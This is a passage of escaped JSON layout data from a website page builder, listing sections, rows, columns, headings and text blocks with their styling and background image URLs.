0.3)\",\"blur\":\"30\",\"y\":\"10\"}]},\"margin\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":false}},\"v\":\"1.1\",\"nodes\":[\"20-c11\",\"20-c15\",\"20-c19\"]},{\"id\":275,\"type\":\"hop-heading\",\"style\":{\"typography\":{\"transform\":\"uppercase\",\"letterSpacing\":{\"unit\":\"px\",\"value\":\"1\"}}},\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"20-c12\",\"20-c16\",\"20-c20\"]},{\"id\":276,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"20-c13\",\"20-c17\",\"20-c21\"]},{\"id\":277,\"type\":\"hop-content\",\"nodeId\":\"126-c1\",\"nodes\":[\"126-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":278,\"nodeId\":\"25-h28\",\"nodes\":[\"25-h28\"],\"v\":\"1.1\"},{\"id\":279,\"type\":\"hop-content\",\"nodeId\":\"122-c1\",\"nodes\":[\"122-c1\"],\"style\":[],\"v\":\"1.1\"},{\"id\":280,\"type\":\"hop-content\",\"nodeId\":\"122-c1\",\"nodes\":[\"122-c1\"],\"v\":\"1.1\"},{\"id\":285,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"122-c2\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":286,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"122-c3\"]},{\"id\":287,\"type\":\"hop-column\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"margin\":{\"top\":{\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"122-c4\"]},{\"id\":288,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"122-c5\"]},{\"id\":289,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"style\":{\"media\":{\"mobile\":{\"typography\":{\"size\":{\"unit\":\"em\",\"value\":\"2.5\"}}},\"tablet\":{\"typography\":{\"size\":{\"unit\":\"em\",\"value\":\"2.5\"}}}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"122-c6\"]},{\"id\":290,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"122-c7\"]},{\"id\":291,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp\"},\"position\":\"center center\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"y\":\"10\",\"blur\":\"30\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"-5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"122-c8\"]},{\"id\":292,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"122-c16\"],\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"}}},{\"id\":293,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"122-c17\"]},{\"id\":294,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-disaster1-scaled-1.jpg\"},\"position\":\"center center\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"30\",\"y\":\"10\"}]},\"zIndex\":\"1\",\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"122-c18\"]},{\"id\":295,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"122-c19\"]},{\"id\":296,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"122-c20\"]},{\"id\":298,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"122-c21\"]},{\"id\":314,\"type\":\"hop-section\",\"nodeId\":\"122-c35\",\"nodes\":[\"122-c9\"],\"v\":\"1.1\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":0},\"bottom\":{\"value\":0}}}},{\"id\":317,\"props\":{\"layout\":{\"equalWidth\":false,\"equalHeight\":false}},\"type\":\"hop-row\",\"nodeId\":\"122-c38\",\"nodes\":[\"122-c13\"],\"v\":\"1.1\"},{\"id\":318,\"type\":\"hop-column\",\"nodeId\":\"122-c39\",\"nodes\":[\"122-c14\"],\"v\":\"1.1\"},{\"id\":319,\"type\":\"hop-text\",\"nodeId\":\"122-c40\",\"nodes\":[\"122-c15\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"size\":{\"unit\":\"px\",\"value\":\"20\"},\"weight\":\"400\",\"family\":\"Baloo\"}}}},\"props\":{\"type\":\"normal\"}},{\"id\":321,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-row\",\"nodeId\":\"122-c42\",\"nodes\":[\"122-c10\"],\"v\":\"1.1\"},{\"id\":322,\"type\":\"hop-column\",\"nodeId\":\"122-c43\",\"nodes\":[\"122-c11\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"outer\":{\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}},\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}}},{\"id\":324,\"type\":\"hop-heading\",\"nodeId\":\"122-c45\",\"nodes\":[\"122-c12\"],\"v\":\"1.1\",\"style\":{\"typography\":{\"weight\":\"600\"}},\"props\":{\"headerType\":\"4\"}},{\"id\":329,\"type\":\"hop-column\",\"nodeId\":\"20-c24\",\"nodes\":[\"20-c24\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":330,\"type\":\"hop-heading\",\"nodeId\":\"20-c25\",\"nodes\":[\"20-c25\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":331,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"20-c26\",\"nodes\":[\"20-c6\"],\"v\":\"1.1\"},{\"id\":333,\"type\":\"hop-column\",\"nodeId\":\"20-c28\",\"nodes\":[\"20-c7\"],\"v\":\"1.1\"},{\"id\":334,\"type\":\"hop-heading\",\"nodeId\":\"20-c29\",\"nodes\":[\"20-c8\"],\"v\":\"1.1\"},{\"id\":335,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"20-c30\",\"nodes\":[\"20-c3\"],\"v\":\"1.1\"},{\"id\":336,\"type\":\"hop-column\",\"nodeId\":\"20-c31\",\"nodes\":[\"20-c4\"],\"v\":\"1.1\"},{\"id\":337,\"type\":\"hop-column\",\"nodeId\":\"20-c32\",\"nodes\":[\"20-c5\"],\"v\":\"1.1\"},{\"id\":338,\"type\":\"hop-content\",\"nodeId\":\"126-c1\",\"nodes\":[\"126-c1\"],\"v\":\"1.1\"},{\"id\":339,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c2\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}},\"props\":{\"width\":\"full-width\"}},{\"id\":340,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c3\"]},{\"id\":341,\"type\":\"hop-column\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"margin\":{\"top\":{\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c4\"]},{\"id\":342,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c5\"]},{\"id\":344,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c6\"]},{\"id\":345,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-ewsimage.png\"},\"position\":\"center center\"}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"y\":\"10\",\"blur\":\"30\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"-5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c7\"]},{\"id\":346,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c8\"],\"props\":{\"width\":\"full-width\"}},{\"id\":347,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c9\"]},{\"id\":348,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-BeforeSimulCast-1.png\"},\"size\":\"contain\"}],\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"30\",\"y\":\"10\"}]},\"zIndex\":\"1\",\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c10\"]},{\"id\":349,\"type\":\"hop-column\",\"style\":{\"textAlign\":\"left\",\"background\":{\"color\":\"${theme.colors.4}\"},\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"customHeight\":{\"min-height\":{\"unit\":\"px\",\"value\":795.9000244140625},\"type\":\"fit-to-content\"}},\"v\":\"1.1\",\"nodes\":[\"126-c11\"]},{\"id\":350,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c12\"]},{\"id\":352,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c13\"]},{\"id\":353,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c14\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}},\"props\":{\"width\":\"full-width\"}},{\"id\":354,\"props\":{\"layout\":{\"equalWidth\":false,\"verticalGap\":0,\"horizontalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c15\"]},{\"id\":355,\"type\":\"hop-column\",\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"textAlign\":\"left\",\"padding\":{\"top\":{\"value\":\"15\",\"unit\":\"%\"},\"right\":{\"value\":\"20\",\"unit\":\"%\"},\"bottom\":{\"value\":\"15\",\"unit\":\"%\"},\"left\":{\"value\":\"20\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"10\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"10\",\"unit\":\"%\"}},\"margin\":{\"top\":{\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"textAlign\":\"center\",\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"}}}},\"tablet\":{\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"value\":\"15\",\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"value\":\"15\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"5\"}}}}},\"transform\":{\"translate\":{\"x\":{\"value\":\"6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.15)\",\"blur\":\"15\",\"y\":\"5\"}]}},\"props\":{\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"126-c16\"]},{\"id\":356,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"5\"},\"v\":\"1.1\",\"nodes\":[\"126-c17\"]},{\"id\":358,\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"126-c18\"]},{\"id\":359,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/raychel-sanner-cswvKS59E90-unsplash-scaled.jpg\"},\"position\":\"center center\",\"size\":\"cover\",\"repeat\":\"no-repeat\",\"attachment\":\"scroll\"}],\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\":\"rgba(0, 0, 0, 0.15)\",\"y\":\"10\",\"blur\":\"30\"}]},\"media\":{\"mobile\":{\"customHeight\":{\"type\":\"min-height\",\"min-height\":{\"value\":\"350\"}},\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"%\"},\"right\":{\"value\":\"0\",\"unit\":\"%\"},\"bottom\":{\"value\":\"0\",\"unit\":\"%\"},\"left\":{\"value\":\"0\",\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"0\"},\"y\":{\"value\":\"-5\"}}}},\"tablet\":{\"transform\":{\"translate\":{\"x\":{\"value\":\"-5\"}}}}},\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"%\"},\"right\":{\"unit\":\"%\"},\"bottom\":{\"value\":\"10\",\"unit\":\"%\"},\"left\":{\"unit\":\"%\"}},\"transform\":{\"translate\":{\"x\":{\"value\":\"-6\",\"unit\":\"%\"},\"y\":{\"value\":0,\"unit\":\"%\"}}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c19\"]},{\"id\":360,\"type\":\"hop-section\",\"v\":\"1.1\",\"nodes\":[\"126-c20\"],\"props\":{\"width\":\"full-width\"}},{\"id\":361,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0}},\"type\":\"hop-row\",\"style\":{\"media\":{\"mobile\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}}}}},\"v\":\"1.1\",\"nodes\":[\"126-c21\"]},{\"id\":362,\"type\":\"hop-column\",\"style\":{\"background\":{\"type\":\"image\",\"image\":[{\"source\":{\"type\":\"image\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-kevin-ku-w7ZyuGYNpRQ-unsplash-scaled-1.jpg\"}}]},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"2\",\"color\